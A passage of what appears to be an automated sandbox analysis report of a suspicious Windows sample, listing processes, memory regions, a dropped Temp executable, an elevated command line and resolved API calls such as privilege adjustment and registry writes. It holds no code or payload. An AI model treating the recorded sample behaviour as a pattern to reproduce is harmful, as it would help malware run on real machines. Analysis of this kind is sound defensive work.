|---|---|---|---|---|
| Get Info | - |
|
7 | |
| Get Info | - |
|
1 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
6 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Get Info | type = Operating System |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #205: dllhost.exe
0
0
| Information | Value |
|---|---|
| ID | #205 |
| File Name | c:\windows\system32\dllhost.exe |
| Command Line | C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:25, Reason: Child Process |
| Unmonitor | End Time: 00:03:40, Reason: Self Terminated |
| Monitor Duration | 00:00:15 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb70 |
| Parent PID | 0x23c (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
5E0
0x
2C0
0x
4B4
0x
C78
0x
E9C
0x
F28
0x
FE0
0x
DA4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x00000079a4d00000 | 0x79a4d00000 | 0x79a4d1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000079a4d00000 | 0x79a4d00000 | 0x79a4d0ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000079a4d10000 | 0x79a4d10000 | 0x79a4d16fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000079a4d20000 | 0x79a4d20000 | 0x79a4d33fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000079a4d40000 | 0x79a4d40000 | 0x79a4e3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000079a4e40000 | 0x79a4e40000 | 0x79a4e43fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000079a4e50000 | 0x79a4e50000 | 0x79a4e51fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x79a4e60000 | 0x79a4f1dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000079a4f20000 | 0x79a4f20000 | 0x79a4faffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000079a4f20000 | 0x79a4f20000 | 0x79a4f20fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000079a4f30000 | 0x79a4f30000 | 0x79a4f36fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000079a4f40000 | 0x79a4f40000 | 0x79a4f40fff | Pagefile Backed Memory | r |
|
|
|
- |
| imm32.dll | 0x79a4f50000 | 0x79a4f83fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000079a4f50000 | 0x79a4f50000 | 0x79a4f50fff | Private Memory | rw |
|
|
|
- |
| private_0x00000079a4f60000 | 0x79a4f60000 | 0x79a4f60fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000079a4f70000 | 0x79a4f70000 | 0x79a4f72fff | Pagefile Backed Memory | r |
|
|
|
- |
| windowsshell.manifest | 0x79a4f80000 | 0x79a4f80fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000079a4f90000 | 0x79a4f90000 | 0x79a4f91fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000079a4fa0000 | 0x79a4fa0000 | 0x79a4faffff | Private Memory | rw |
|
|
|
- |
| private_0x00000079a4fd0000 | 0x79a4fd0000 | 0x79a50cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000079a50d0000 | 0x79a50d0000 | 0x79a51cffff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0x79a51d0000 | 0x79a52a5fff | Memory Mapped File | r |
|
|
|
- |
| sortdefault.nls | 0x79a51d0000 | 0x79a5506fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000079a5510000 | 0x79a5510000 | 0x79a560ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000079a5610000 | 0x79a5610000 | 0x79a570ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000079a5710000 | 0x79a5710000 | 0x79a580ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000079a5810000 | 0x79a5810000 | 0x79a590ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000079a5910000 | 0x79a5910000 | 0x79a5a97fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000079a5aa0000 | 0x79a5aa0000 | 0x79a5c20fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000079a5c30000 | 0x79a5c30000 | 0x79a702ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000079a7030000 | 0x79a7030000 | 0x79a70bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000079a70c0000 | 0x79a70c0000 | 0x79a71bffff | Private Memory | rw |
|
|
|
- |
| ole32.dll | 0x79a71c0000 | 0x79a7300fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00007df600000000 | 0x7df600000000 | 0x7ff5ffffffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff756f0c000 | 0x7ff756f0c000 | 0x7ff756f0dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff756f0e000 | 0x7ff756f0e000 | 0x7ff756f0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff756f10000 | 0x7ff756f10000 | 0x7ff75700ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff757010000 | 0x7ff757010000 | 0x7ff757032fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff757034000 | 0x7ff757034000 | 0x7ff757035fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff757036000 | 0x7ff757036000 | 0x7ff757036fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff757038000 | 0x7ff757038000 | 0x7ff757039fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff75703a000 | 0x7ff75703a000 | 0x7ff75703bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff75703c000 | 0x7ff75703c000 | 0x7ff75703dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff75703e000 | 0x7ff75703e000 | 0x7ff75703ffff | Private Memory | rw |
|
|
|
- |
| dllhost.exe | 0x7ff757890000 | 0x7ff757896fff | Memory Mapped File | rwx |
|
|
|
- |
| thumbcache.dll | 0x7ffc47230000 | 0x7ffc4727afff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ffc4cbd0000 | 0x7ffc4ce43fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ffc511b0000 | 0x7ffc51332fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7ffc52d70000 | 0x7ffc52e05fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc53a90000 | 0x7ffc53ac2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc54210000 | 0x7ffc54226fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc54280000 | 0x7ffc5428afff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffc54f80000 | 0x7ffc55032fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffc55280000 | 0x7ffc552b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffc55380000 | 0x7ffc554dbfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffc55910000 | 0x7ffc559cdfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffc57970000 | 0x7ffc57a14fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #206: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #206 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula "To_Do_List.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:25, Reason: Child Process |
| Unmonitor | End Time: 00:03:31, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb38 |
| Parent PID | 0xe20 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
9F8
0x
28C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| imm32.dll | 0x00290000 | 0x002b9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0076ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000670000 | 0x00670000 | 0x0076ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000770000 | 0x00770000 | 0x008bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008c0000 | 0x008c0000 | 0x00a47fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a50000 | 0x00a50000 | 0x00bd0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000be0000 | 0x00be0000 | 0x01fdffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
